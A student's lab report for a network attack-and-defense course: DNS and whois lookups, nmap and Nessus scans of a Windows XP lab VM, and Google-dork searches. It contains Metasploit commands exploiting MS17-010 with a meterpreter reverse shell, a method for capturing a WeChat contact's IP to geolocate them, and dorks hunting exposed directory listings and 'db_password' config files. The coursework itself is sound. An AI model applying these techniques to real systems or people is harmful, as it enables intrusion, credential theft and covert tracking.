20222409 2024-2025-1 《網路與系統攻防技術》實驗五實驗報告

20222409王勤博發表於2024-11-29

1.實驗內容

1.1 本週學習內容

本週學習了資訊收集與滲透測試相關技術,主要包括Metasploit、nmap和Nessus的使用。

  • Metasploit是滲透測試框架,能提供多種攻擊模組,如遠端程式碼執行、提權和後滲透功能(如鍵盤記錄、檔案操作等),可用於模擬攻擊和漏洞利用;
  • nmap被用於掃描目標主機的埠和服務,識別其作業系統及執行的服務;
  • Nessus則用於漏洞掃描,發現目標主機的安全漏洞並進行風險評估。

1.2 實踐內容

1.2.1 從www.besti.edu.cn、baidu.com、sina.com.cn中選擇一個DNS域名進行查詢,獲取如下資訊:

  • DNS註冊人及聯絡方式
  • 該域名對應IP地址
  • IP地址註冊人及聯絡方式
  • IP地址所在國家、城市和具體地理位置

PS:使用whois、dig、nslookup、traceroute、以及各類線上和離線工具進行蒐集資訊(要求必須用WHOIS、dig、nslookup、traceroute、tracert以及線上工具)

1.2.2 嘗試獲取BBS、論壇、QQ、MSN中某一好友的IP地址,並查詢獲取該好友所在的具體地理位置。

1.2.3 使用nmap開源軟體對靶機環境進行掃描,回答以下問題並給出操作命令。

  • 靶機IP地址是否活躍
  • 靶機開放了哪些TCP和UDP埠
  • 靶機安裝了什麼作業系統,版本是多少
  • 靶機上安裝了哪些服務

1.2.4 使用Nessus開源軟體對靶機環境進行掃描,回答以下問題並給出操作命令。

  • 靶機上開放了哪些埠
  • 靶機各個埠上網路服務存在哪些安全漏洞
  • 你認為如何攻陷靶機環境,以獲得系統訪問權

1.2.5 個人資訊蒐集

  • 透過搜尋引擎搜尋自己在網上的足跡,並確認自己是否有隱私和資訊洩漏問題。
  • 練習使用Google hack蒐集技能完成搜尋(至少10種搜尋方法)

2.實驗過程

2.1 域名資訊查詢

本模組的核心任務是透過對域名(如www.besti.edu.cn)的多角度查詢,掌握目標系統的基礎網路資訊,包括DNS註冊資訊、對應的IP地址以及IP歸屬地等。我們將利用命令列工具和線上平臺,逐步完成以下任務。
結論如表1所示:

類別 資訊內容
DNS 註冊人及聯絡方式 註冊人組織: 北京百度網訊科技有限公司 (Beijing Baidu Netcom Science Technology Co., Ltd.)
序號產生器構: MarkMonitor Inc.
電話: +1.2086851750
郵箱: abusecomplaints@markmonitor.com
該域名對應 IP 地址 IP 地址 1: 39.156.66.10
IP 地址 2: 110.242.68.66
IP 地址註冊人及聯絡方式 IP 地址 1 (39.156.66.10):
註冊人: Haijun Li
註冊組織: China Mobile Communications Corporation
電話: +86 1052686688
傳真: +86 10 52616187
郵箱: hostmaster@chinamobile.com
濫用投訴郵箱: abuse@chinamobile.com

IP 地址 2 (110.242.68.66):
註冊人: Kong Lingfei
註冊組織: China Unicom Hebei Province Network
電話: +86-311-86681601
傳真: +86-311-86689210
郵箱: konglf5@chinaunicom.cn
濫用投訴郵箱: zhaoyz3@chinaunicom.cn
IP 地址所在國家、城市和具體地理位置 IP 地址 1 (39.156.66.10):
國家: 中國 (CN)
城市: 北京 (Beijing)
區域: 北京 (Beijing)
經緯度: 39.9075, 116.3972
郵編: 100000
具體地址: 29, Jinrong Ave., Xicheng District, Beijing, 100032

IP 地址 2 (110.242.68.66):
版本 1 (WHOIS 查詢):
國家: 中國 (CN)
城市: 石家莊市 (Shi Jiazhuang City)
具體地址: 45, Guang An Street, Shi Jiazhuang City, Hebei Province, 050011
版本 2 (opengps 查詢):
國家: 中國 (CN)
城市: 保定市 (Baoding)
具體地址: 順平縣平安東大街 幸福社群衛生站南 118 米

表1:DNS查詢資訊彙總

2.1.1 使用WHOIS查詢DNS註冊人及聯絡方式

WHOIS是一種查詢域名註冊詳細資訊的標準協議,可用於瞭解域名註冊人、序號產生器構及相關聯絡方式。

先輸入以下命令(注意沒有“www.”),結果如圖1:

whois besti.edu.cn


圖1:WHOIS查詢besti.edu.cn的結果
可能是學院官網進行了保護,那麼我們換個網站,結果如圖2

whois baidu.com


圖2:WHOIS查詢baidu.com的結果

易知DNS註冊人及聯絡方式:

  • 註冊人組織:北京百度網訊科技有限公司(Beijing Baidu Netcom Science Technology Co., Ltd.)
  • 序號產生器構:MarkMonitor Inc.
  • 聯絡方式-電話:+1.2086851750
  • 聯絡方式-電子郵件:abusecomplaints@markmonitor.com

2.1.2 使用DIG查詢域名對應的IP地址

DIG是一種靈活的DNS查詢工具,可用於獲取域名的DNS記錄,包括A記錄、CNAME記錄等。
執行以下命令(注意沒有“www.”)查詢域名的對應的IP地址,結果如圖3:

dig baidu.com


圖3:使用DIG查詢baidu.com的IP地址

從DIG查詢結果的ANSWER SECTION中提取到以下該域名對應IP地址:

  • 39.156.66.10
  • 110.242.68.66

2.1.3 使用NSLOOKUP驗證獲取的IP地址

輸入以下命令,結果如圖4所示:

nslookup baidu.com


圖4:使用NSLOOKUP查詢baidu.com的IP地址
從NSLOOKUP的輸出中提取到以下IP地址(同2.1.2):

  • 39.156.66.10
  • 110.242.68.66

2.1.4 使用WHOIS查詢IP地址註冊資訊

  1. 查詢IP地址39.156.66.10
whois 39.156.66.10


圖5:WHOIS查詢IP地址39.156.66.10的註冊資訊
可以提取到以下內容:
IP註冊人:Haijun Li
聯絡方式:

  • 電話:+86 1052686688
  • 傳真:+86 10 52616187
  • 郵箱:hostmaster@chinamobile.com
  • 濫用投訴郵箱:abuse@chinamobile.com

IP地址所在國家、城市和具體地理位置:

  • 國家:中國(CN)
  • 城市:北京(Beijing)
  • 地址:China Mobile Communications Corporation, 29, Jinrong Ave., Xicheng District, Beijing, 100032
  1. 查詢IP地址110.242.68.66
whois 110.242.68.66


圖6:WHOIS查詢IP地址110.242.68.66的註冊資訊
可以提取到以下內容:
註冊人:Kong Lingfei
聯絡方式:

  • 郵箱:konglf5@chinaunicom.cn
  • 電話:+86-311-86681601
  • 傳真:+86-311-86689210
  • 濫用投訴郵箱:zhaoyz3@chinaunicom.cn
    IP地址所在國家、城市和具體地理位置:
  • 國家:中國(CN)
  • 省份:河北省(Hebei Province)
  • 城市:石家莊市(Shi Jiazhuang City)
  • 地址:China Unicom Hebei province network, 45, Guang An Street, Shi Jiazhuang City, Hebei Province, 050011

2.1.5 使用TRACEROUTE跟蹤網路路由

在Linux系統中輸入:

traceroute baidu.com


圖7:使用TRACEROUTE跟蹤baidu.com的路由
第1跳為本地網路裝置,IP地址為192.168.222.2,響應時間正常。
第2~30跳均顯示***,未返回任何路由節點資訊。
推測中間節點可能被防火牆或路由策略遮蔽,限制了探測包的響應。

或在Windows系統中輸入:

tracert baidu.com


圖8:使用TRACERT跟蹤baidu.com的路由
資料包從本地閘道器(192.168.50.1)出發,經過多個路由節點到達目標(39.156.66.10)。其中,網路路徑部分受限(顯示“請求超時”)但未完全阻斷。

2.1.6 使用線上工具獲取IP地址註冊人及地理位置

  1. 查詢IP地址39.156.66.10
    訪問ipinfo,輸入IP地址39.156.66.10:

    圖9:使用線上工具查詢IP地址39.156.66.10的地理位置
    查詢得資訊
    註冊人:China Mobile Communications Corporation
    聯絡方式:
    地址:29, Jinrong Ave., Xicheng District, Beijing, 100032
    國家:中國(CN)
    郵箱:abuse@chinamobile.com
    電話:+000000000(佔位符,實際電話號碼未公開)
    國家:中國(CN)
    城市:北京(Beijing)
    區域:北京(Beijing)
    經緯度:39.9075,116.3972
    郵編:100000

  2. 查詢IP地址110.242.68.66
    訪問opengps,輸入IP地址110.242.68.66,查詢得資訊:

    圖10:使用線上工具查詢IP地址110.242.68.66的地理位置
    發現位置和使用whois 110.242.68.66查詢得到的不一致
    國家:中國(CN)
    省份:河北省
    城市:保定市
    具體地址:順平縣平安東大街 幸福社群衛生站南118米

2.2 獲取好友的IP地址和具體地理位置

2.2.1 獲取好友的IP地址

開啟wireshark,給微信好友打語音電話
在過濾器中輸入與微信相關的流量規則

udp && ip.addr==192.168.50.16

以下是wireshark抓包截圖

圖11:Wireshark抓取微信語音電話的IP地址
以下是在站長工具箱查詢到的具體地址

圖12:使用站長工具查詢IP地址211.90.238.71的地理位置

查詢得對方IP地址為211.90.238.71,地理位置為浙江杭州,與其真實地理位置相符。且圓圈範圍為杭州主城區,圓心為西溪溼地附近。
圖13為浙大在杭州主城區的校區分佈圖。可見圓圈包括了浙大紫金港校區,即同學所在地。

圖13:浙江大學主要校區分佈圖
iplocation.net多源IP資料查詢網站上檢視,大多結果為杭州,進一步驗證了正確性。

2.3 使用Nmap開源軟體對靶機環境進行掃描

選擇windows xp pro為靶機,ip為192.168.222.139
選擇kali linux為攻擊機,ip為192.168.222.130
結果如表2所示:

問題 結果
靶機IP地址是否活躍 是,靶機 IP 地址 192.168.222.139 活躍,顯示 Host is up (0.00060s latency)
靶機開放了哪些TCP埠 135/tcp(msrpc),139/tcp(netbios-ssn),445/tcp(microsoft-ds)。
靶機開放了哪些UDP埠 123/udp(NTP),137/udp(NetBIOS 名稱服務),
開放或過濾:138/udp(NetBIOS 資料包服務),445/udp(Microsoft-DS),500/udp(ISAKMP),1025/udp(Blackjack),1900/udp(UPnP),4500/udp(NAT-T IKE)。
靶機安裝了什麼作業系統,版本是多少 Windows 2000(SP2 - SP4),Windows XP(SP2 - SP3),Windows Server 2003(SP0 - SP2)。
靶機上安裝了哪些服務 25/tcp(tcpwrapped),110/tcp(tcpwrapped)。

表2: Nmap掃描結果彙總

2.3.1 靶機IP地址是否活躍

使用以下命令對靶機進行Ping掃描:

nmap -sn 192.168.222.139

命令說明:

  • -sn:啟用Ping掃描,僅進行主機發現,不掃描埠


圖14:Nmap執行Ping掃描結果,靶機活躍
輸出顯示Host is up (0.00060s latency),靶機IP地址192.168.222.139是活躍的

2.3.2 靶機開放了哪些TCP和UDP埠

在確認靶機線上之後,下一步是對靶機的TCP和UDP埠進行掃描

  1. TCP埠掃描
    使用-sS引數進行SYN掃描:
nmap -sS 192.168.222.139


圖15:Nmap掃描靶機TCP埠結果
可見靶機開放了以下TCP埠:135、139、445
開放的TCP埠對應以下服務:

  • 135/tcp:msrpc(Microsoft RPC 服務)
  • 139/tcp:netbios-ssn(NetBIOS Session 服務)
  • 445/tcp:microsoft-ds(Microsoft-DS 服務)
  1. UDP埠掃描
    使用-sU引數進行UDP掃描:
nmap -sU 192.168.222.139


圖16:Nmap掃描靶機UDP埠結果
可見靶機開放了以下UDP埠:123、137
開放或過濾了以下UDP埠:138、445、500、1025、1900、4500。
UDP埠對應以下服務:

  • 123/udp:NTP(網路時間協議)
  • 137/udp:NetBIOS 名稱服務
  • 138/udp:NetBIOS 資料包服務
  • 445/udp:Microsoft-DS(用於檔案和列印共享)
  • 500/udp:ISAKMP(網際網路金鑰交換協議)
  • 1025/udp:Blackjack(未知服務)
  • 1900/udp:UPnP(通用即插即用)
  • 4500/udp:NAT-T IKE(網路地址轉換穿透)

2.3.3 靶機安裝了什麼作業系統,版本是多少

nmap -O 192.168.222.139


圖17:Nmap 執行作業系統識別的結果
可見,靶機安裝的作業系統和版本可能為:

  • Windows 2000(SP2 - SP4)
  • Windows XP(SP2 - SP3)
  • Windows Server 2003(SP0 - SP2)

出現多個作業系統版本的原因,主要是因為Nmap的作業系統識別是基於對目標主機網路行為的推測。Nmap會嘗試透過分析目標主機響應的特徵(例如埠開放情況、響應時間、特定協議的實現方式等)來猜測可能的作業系統。但這些特徵往往具有相似性,不同版本的作業系統,尤其是同一廠商的不同版本,可能會展現出類似的網路行為和協議響應,因此Nmap無法精確區分每個版本。

2.3.4 靶機上安裝了哪些服務

nmap -sV 192.168.1.180


圖18:Nmap掃描靶機安裝服務的結果
Nmap掃描結果顯示靶機上安裝了以下服務:

  • 25/tcp:tcpwrapped
  • 110/tcp:tcpwrapped

2.4 使用Nessus開源軟體對靶機環境進行掃描

歷經千辛萬苦,安裝好了nessus
與2.3一樣:
選擇windows xp pro為靶機,ip為192.168.222.139
選擇kali linux為攻擊機,ip為192.168.222.130

2.4.1 靶機上開放了哪些埠

在Nessus控制檯中,點選右上角的New Scan按鈕,進入新建掃描介面。
在掃描模板中選擇Host Discovery模板。
在掃描配置介面,輸入掃描任務的名稱。在Targets欄位中,輸入靶機的IP地址192.168.222.139
其他引數,保持預設設定即可。

圖19:Nessus掃描任務配置
配置完成後,點選Launch按鈕開始掃描。

圖20:Nessus執行主機發現掃描的結果
掃描完成後,Nessus會展示目標主機的開放埠。可以看到靶機的埠123,135,137,139,445開放。

2.4.2 靶機各個埠上網路服務存在哪些安全漏洞

在Nessus控制檯中,點選New Scan按鈕,選擇Advanced Scan模板。
其他步驟和2.4.1大同小異

圖21:Nessus執行高階掃描的漏洞發現結果
掃描結果顯示,靶機的445埠上執行著SMB服務,且存在MS17-010、MS08-067和MS09-001已知漏洞,靶機的135埠上執行RPC服務,139埠上開放NetBIOS,均可能受到未修補漏洞的影響。

2.4.3 如何攻陷靶機環境,以獲得系統訪問權

可以利用MS17-010 EternalBlue漏洞
輸入以下命令

use exploit/windows/smb/ms17_010_psexec
set RHOSTS 192.168.222.139
set LHOST 192.168.222.130
set PAYLOAD windows/meterpreter/reverse_tcp
run

最後,輸入ipconfigsysinfo進行驗證,確認獲取了系統訪問權

圖22:MS17-010 EternalBlue漏洞驗證結果

2.5 個人資訊蒐集與隱私洩漏檢查

2.5.1 透過搜尋引擎搜尋自己在網上的足跡,並確認隱私和資訊洩漏問題

在谷歌中搜尋我的名字,搜出的都是同名的,沒有我的個人隱私和資訊

圖23:谷歌搜尋自己名字結果

接著搜尋學號,除了實驗報告外,搜出的基本是不相干的,

圖24:谷歌搜尋學號結果

搜尋手機號,沒有相關資訊,但在百度中居然能識別出是溫州的號碼,如圖25所示:

圖25:百度搜尋手機號結果

搜尋郵箱,谷歌中沒有任何搜尋結果。百度中搜尋結果如圖26所示,沒有搜到有用的資訊。

圖26:百度搜尋郵箱結果

接下來,更換搜尋引擎,結果大同小異。

2.5.2 練習使用Google Hack技術完成資訊蒐集(至少10種搜尋方法)

  1. site:限定搜尋結果來源於特定網站
site:besti.edu.cn 王志強


圖26:使用site限定搜尋來源於學校官網的資訊
限定來源於學校官網搜尋到的老師的資訊

  1. filetype:限定搜尋檔案型別
filetype:pdf "王勤博"


圖27:使用filetype限定搜尋PDF檔案,查詢包含“王勤博”的內容
逆天了,居然搜出了以前生競的陳年舊事。

  1. inurl: 搜尋URL中包含指定關鍵詞的頁面
inurl:login


圖28:使用inurl搜尋包含“login”的URL頁面

  1. intitle:查詢網頁標題中包含特定關鍵詞的頁面
    嘗試查詢標題中包含“index of”關鍵詞的頁面,尋找暴露的目錄索引頁面
intitle:"index of"


圖29:使用intitle查詢包含“index of”的網頁標題
可見有兩個網站暴露了目錄索引頁面,且點進去後確實是目錄索引頁。

  1. intext: 查詢網頁內容中包含特定關鍵詞的頁面
intext:"網鼎杯""北京電子科技學院""第四屆"


圖30:使用intext搜尋包含“網鼎杯”和“北京電子科技學院”的網頁內容
真能搜到我們啊

  1. allintitle: 查詢標題中同時包含多個關鍵詞的頁面
    動動手指,關注下美國大選
allintitle:川普 哈里斯


圖31:使用allintitle查詢包含“川普”和“哈里斯”的網頁標題

  1. "":引號精確匹配
    先看沒有精準匹配的版本

    圖32:未使用引號精確匹配搜尋內容
    可以看到非常逆天,錯別字都看不出來


圖33:使用引號精確匹配搜尋內容

加上引號後就不犯病了。甚至還搜出了我的同名抖音,樂。

  1. link:查詢所有指向指定頁面的外部連結
    來找找指向遊戲“鳴潮”官網的連結吧
link:mc.kurogames.com


圖34:使用link查詢指向“鳴潮”官網的外部連結

  1. ext:限定搜尋特定型別的網頁副檔名
    搜尋 .conf配置檔案中包含"db_password"關鍵詞的檔案,找找有沒有笨蛋不做安全保護的
ext:conf "db_password"


圖35:使用ext搜尋.conf配置檔案中包含“db_password”的內容
好吧,事實證明並沒有

  1. -: 排除包含特定關鍵詞的結果
王勤博 -足協 -專家 -電氣 -facebook -企業 -記者 -youtube -醫科 -領英 -名字 -設計 -鐵路 -困難 -梅西 -中等職業 -瘟神 -書記 -河北 -山西 -政府 -開發區 -助學 -寶貝 -越野 -椒江 -機車

真服了,我這名字有這麼大眾?排除這麼多才搜到我的資訊?
居然還能找到我和高中同學做的挑戰杯(狗頭)

圖36:使用-排除無關資訊

  1. 萬用字元*:填補你在搜尋時不確定或不完整的部分
how to * money

可見非常聰明,猜到了我想搜的 make,earn

圖37:使用*萬用字元搜尋不確定的關鍵詞

  1. ..:搜尋特定區間內的數字
    想要搜尋北京人均價格100-500的海鮮餐廳
"北京""海鮮" "人均"100..500

搜出來的結果基本符合期望,搜尋效果和在小紅書比怎麼樣另說。

圖38:使用..搜尋價格區間內的海鮮餐廳

  1. before/after:限定日期
    搜搜李子柒復出後,日期的格式為yyyy-mm-dd
李子柒 after:20241001


圖39:使用after限定日期進行資訊篩選

3.問題及解決方案

  • 問題1:更新外掛時出現"Nessus is offline and cannot do software updates via the feed.",導致nessus中"no plugins"

    圖40:Nessus 更新外掛時出現離線錯誤的截圖
  • 問題1解決方案:先執行命令./nessuscli fetch -register-offline nessus.license
    ,再執行命令./nessuscli update all-2.0.tar.gz。按照這個順序多試幾次。
  • 問題2:多次安裝nessus失敗後,Kali的圖形化介面消失,只剩黑屏
  • 問題2解決方案:試了很多教程不行,重灌解決。
  • 問題3:2.4.3中利用MS17-010 EternalBlue漏洞時,遇到了錯誤
[-] 192.168.222.139:445 - Exploit aborted due to failure: no-target: This module only supports x64 (64-bit) targets
  • 問題3解決方案:這是因為使用的MS17-010 EternalBlue漏洞模組只支援64位的系統,而你的靶機是32位的Windows XP。只需將使用的模組改為use exploit/windows/smb/ms17_010_psexec即可。

4.學習感悟、思考等

透過本次實驗,我掌握了資訊蒐集、漏洞利用和滲透測試的基本過程。從使用nmap和whois等工具獲取目標資訊,到透過Metasploit利用MS17-010漏洞進行攻擊,體驗了攻擊的全流程。在實驗中,我認識到攻擊需要根據目標環境選擇合適的漏洞模組,針對32位系統採用不同的攻擊方法。實驗加深了我對滲透測試的理解,提升了我分析掃描結果和選擇攻擊手段的能力。

參考資料

  • nessus快速安裝使用指南(非常詳細)零基礎入門到精通,收藏這一篇就夠了
  • kali更新後出現黑屏,右上角出現游標閃爍不能開機的情況
  • Nessus Agent Updates for Offline host

相關文章